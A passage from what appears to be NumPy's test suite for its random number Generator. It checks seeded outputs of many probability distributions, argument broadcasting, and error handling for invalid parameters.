actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[ 5.03850858902096, 7.9228656732049 ],
[18.73983605132985, 19.57961681699238],
[18.17897755150825, 18.17653912505234]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random = Generator(MT19937(self.seed))
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[ 1, 10],
[ 1, 12],
[ 9, 10]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random = Generator(MT19937(self.seed))
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[ 4.688397515056245, -0.289514845417841],
[ 4.981176042584683, -0.633224272589149],
[-0.055915275687488, -0.333962478257953]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[ 9, 9],
[ 9, 9],
[10, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random = Generator(MT19937(self.seed))
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.156353949272393, 1.195863024830054],
[-3.435458081645966, 1.656882398925444],
[ 0.924824032467446, 1.251116432209336]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random = Generator(MT19937(self.seed))
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-4.338584631510999, 1.890171436749954],
[-4.64547787337966 , 2.514545562919217],
[ 1.495389489198666, 1.967827627577474]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[ 0.0268252166335, 13.9534486483053],
[ 0.1204014788936, 2.2422077497792],
[ 4.2484199496128, 12.0093343977523]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random = Generator(MT19937(self.seed))
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[14, 17],
[3, 18],
[5, 1]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[1, 5, 1, 6, 4, 3],
[4, 2, 6, 2, 4, 2]],
[[5, 3, 2, 6, 3, 1],
[4, 4, 0, 2, 3, 7]],
[[6, 3, 1, 5, 3, 2],
[5, 5, 3, 1, 2, 4]]])
assert_array_equal(actual, desired)
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal(self, method):
random = Generator(MT19937(self.seed))
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size, method=method)
desired = np.array([[[-1.747478062846581, 11.25613495182354 ],
[-0.9967333370066214, 10.342002097029821 ]],
[[ 0.7850019631242964, 11.181113712443013 ],
[ 0.8901349653255224, 8.873825399642492 ]],
[[ 0.7130260107430003, 9.551628690083056 ],
[ 0.7127098726541128, 11.991709234143173 ]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov, method=method)
desired = np.array([0.233278563284287, 9.424140804347195])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non symmetric covariance input raises exception when
# check_valid='raises' if using default svd method.
mean = [0, 0]
cov = [[1, 2], [1, 2]]
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov,
method='eigh')
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise', method='eigh')
# check degenerate samples from singular covariance matrix
cov = [[1, 1], [1, 1]]
if method in ('svd', 'eigh'):
samples = random.multivariate_normal(mean, cov, size=(3, 2),
method=method)
assert_array_almost_equal(samples[..., 0], samples[..., 1],
decimal=6)
else:
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov, method=method)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_basic_stats(self, method):
random = Generator(MT19937(self.seed))
n_s = 1000
mean = np.array([1, 2])
cov = np.array([[2, 1], [1, 2]])
s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
s_center = s - mean
cov_emp = (s_center.T @ s_center) / (n_s - 1)
# these are pretty loose and are only designed to detect major errors
assert np.all(np.abs(s_center.mean(-2)) < 0.1)
assert np.all(np.abs(cov_emp - cov) < 0.2)
def test_negative_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[543, 727],
[775, 760],
[600, 674]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_negative_binomial_p0_exception(self):
# Verify that p=0 raises an exception.
with assert_raises(ValueError):
x = random.negative_binomial(1, 0)
def test_noncentral_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[ 1.70561552362133, 15.97378184942111],
[13.71483425173724, 20.17859633310629],
[11.3615477156643 , 3.67891108738029]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
[1.14554372041263e+00, 1.38187755933435e-03],
[1.90659181905387e+00, 1.21772577941822e+00]])
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[0.82947954590419, 1.80139670767078],
[6.58720057417794, 7.00491463609814],
[6.31101879073157, 6.30982307753005]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[0.060310671139 , 0.23866058175939],
[0.86860246709073, 0.2668510459738 ],
[0.23375780078364, 1.88922102885943]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random = Generator(MT19937(self.seed))
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.618412914693162, 2.635726692647081],
[-2.116923463013243, 0.807460983059643],
[ 1.446547137248593, 2.485684213886024]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random = Generator(MT19937(self.seed))
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
[7.2640150889064703e-01, 3.4650454783825594e+05],
[4.5852344481994740e+04, 6.5851383009539105e+07]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random = Generator(MT19937(self.seed))
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[0, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('int64').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random = Generator(MT19937(self.seed))
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
[2.482442984543471e-10, 1.527108843266079e-01],
[8.188283434244285e-02, 3.950547209346948e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[ 4.51734079831581, 15.6802442485758 ],
[ 4.19850651287094, 17.08718809823704],
[14.7907457708776 , 15.85545333419775]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random = Generator(MT19937(self.seed))
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[-1.489437778266206, -3.275389641569784],
[ 0.560102864910406, -0.680780916282552],
[-1.314912905226277, 0.295852965660225]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.standard_exponential(size=(3, 2), method='inv')
desired = np.array([[0.102031839440643, 1.229350298474972],
[0.088137284693098, 1.459859985522667],
[1.093830802293668, 1.256977002164613]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_expoential_type_error(self):
assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
def test_standard_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62970724056362, 1.22379851271008],
[3.899412530884 , 4.12479964250139],
[3.74994102464584, 3.74929307690815]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gammma_scalar_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(3, dtype=np.float32)
desired = 2.9242148399353027
assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62971, 1.2238 ],
[3.89941, 4.1248 ],
[3.74994, 3.74929]])
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gammma_float_out(self):
actual = np.zeros((3, 2), dtype=np.float32)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, dtype=np.float32)
desired = np.array([[10.14987, 7.87012],
[ 9.46284, 12.56832],
[13.82495, 7.81533]], dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_unknown_type(self):
assert_raises(TypeError, random.standard_gamma, 1.,
dtype='int32')
def test_out_size_mismatch(self):
out = np.zeros(10)
assert_raises(ValueError, random.standard_gamma, 10.0, size=20,
out=out)
assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1),
out=out)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random = Generator(MT19937(self.seed))
actual = random.standard_normal(size=(3, 2))
desired = np.array([[-1.870934851846581, 1.25613495182354 ],
[-1.120190126006621, 0.342002097029821],
[ 0.661545174124296, 1.181113712443012]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_normal_unsupported_type(self):
assert_raises(TypeError, random.standard_normal, dtype=np.int32)
def test_standard_t(self):
random = Generator(MT19937(self.seed))
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[-1.484666193042647, 0.30597891831161 ],
[ 1.056684299648085, -0.407312602088507],
[ 0.130704414281157, -2.038053410490321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random = Generator(MT19937(self.seed))
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[ 7.86664070590917, 13.6313848513185 ],
[ 7.68152445215983, 14.36169131136546],
[13.16105603911429, 13.72341621856971]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random = Generator(MT19937(self.seed))
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[2.13306255040998 , 7.816987531021207],
[2.015436610109887, 8.377577533009589],
[7.421792588856135, 7.891185744455209]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[ 1.107972248690106, 2.841536476232361],
[ 1.832602376042457, 1.945511926976032],
[-0.260147475776542, 2.058047492231698]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random = Generator(MT19937(self.seed))
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[0.26871721804551, 3.2233942732115 ],
[2.20328374987066, 2.40958405189353],
[2.07093587449261, 0.73073890064369]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random = Generator(MT19937(self.seed))
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.138613914769468, 1.306463419753191],
[0.111623365934763, 1.446570494646721],
[1.257145775276011, 1.914247725027957]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random = Generator(MT19937(self.seed))
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random = Generator(MT19937(self.seed))
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[ 1, 1],
[ 10, 867],
[354, 2]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def test_uniform(self):
random = Generator(MT19937(self.seed))
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095])
random = Generator(MT19937(self.seed))
actual = random.uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
random = Generator(MT19937(self.seed))
desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097])
random = Generator(MT19937(self.seed))
actual = random.normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
normal = random.normal
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455])
random = Generator(MT19937(self.seed))
beta = random.beta
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
random = Generator(MT19937(self.seed))
actual = random.beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
std_gamma = random.standard_gamma
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258])
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
random = Generator(MT19937(self.seed))
gamma = random.gamma
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763])
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
random = Generator(MT19937(self.seed))
f = random.f
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629])
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_f = random.noncentral_f
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
random = Generator(MT19937(self.seed))
desired = np.array([0.04714867120827, 0.1239390327694])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589])
random = Generator(MT19937(self.seed))
actual = random.chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399])
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
random = Generator(MT19937(self.seed))
nonc_chi = random.noncentral_chisquare
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983])
random = Generator(MT19937(self.seed))
actual = random.standard_t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326])
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa)
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013])
random = Generator(MT19937(self.seed))
actual = random.pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807])
random = Generator(MT19937(self.seed))
actual = random.power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202])
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
laplace = random.laplace
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081])
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
gumbel = random.gumbel
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397])
random = Generator(MT19937(self.seed))
actual = random.logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276])
random = Generator(MT19937(self.seed))
lognormal = random.lognormal
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean, sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499])
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864])
random = Generator(MT19937(self.seed))
actual = random.wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326])
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
